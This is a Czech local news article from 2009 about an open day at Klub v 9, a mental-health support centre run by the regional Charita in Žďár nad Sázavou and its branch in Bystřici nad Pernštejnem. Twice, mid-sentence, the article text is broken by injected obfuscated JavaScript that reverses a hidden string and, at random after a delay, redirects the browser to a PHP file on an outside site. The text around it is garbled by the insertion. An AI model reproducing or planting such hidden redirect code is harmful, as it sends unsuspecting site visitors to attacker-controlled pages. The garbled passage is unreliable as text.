Žďár nad Sázavou, zdar nad sazavou, aktuality, klub v 9
Rainbow page separator

Na Klubu v 9 přivítali veřejnost a blízké uživatelů

Úterý, 13. října 2009

Na Klubu v 9 – centru služeb na podporu duševního zdraví, který spadá pod Oblastní charitu ve Žďáře nad Sázavou, se ve středu 7.10. 2009 v rámci Týdne sociálních služeb otevřely dveře všem, kteří se zajímají o službu, kterou zařízení poskytuje.

Odborná i široká veřejnost tak měla možnost prohlédnout si pros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory zařízení, dozvědět se vše, co ji zajímá a nalézt odpovědi na své otázky. „Den otevřených dveří se těšil vysoké návštěvnosti. Zájem projevili nejenom kolegové ze sociálního odboru, ale také členové zastupitelstva města Žďáru nad Sázavou a školská zařízení,  zabývající se studiem sociální politiky a sociální práce. Mile nás také překvapila návštěva pracovníků a uživatelů Denního centra při Psychiatrické léčebně Jihlava, s nimiž spolupracujeme a jejich spolupráce si velmi vážíme,“ řekla Mgr. Lucie Dolníčková, sociální pracovnice Klubu v 9.

Dveře se ve středu otevřely i na pobočce Klubu v 9 v Bystřici nad Pernštejnem, jejíž sídlo je na Hornické ulici v budově Domu s pečovatelskou službou. Zde bylo připraveno odpolední setkání pro rodiče a osoby blízké svých uživatelů. „Návštěvníci mohli shlédnout ukázku rukodělných technik z tvořivých dílen Klubu v 9, také byla připravena nabídka propagačních materiálů a malá výstavka široké škály výrobků samotných uživatelů. Hlavním cílem setkání bylo navázat bližší kontakty s rodiči uživatelů a zároveň je podpořit a dodat jim energii do dalších dnů,“ dodala Bc. Ivana Ptáčková, sociální pracovnice Klubu, která tím[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to setkáním provázela.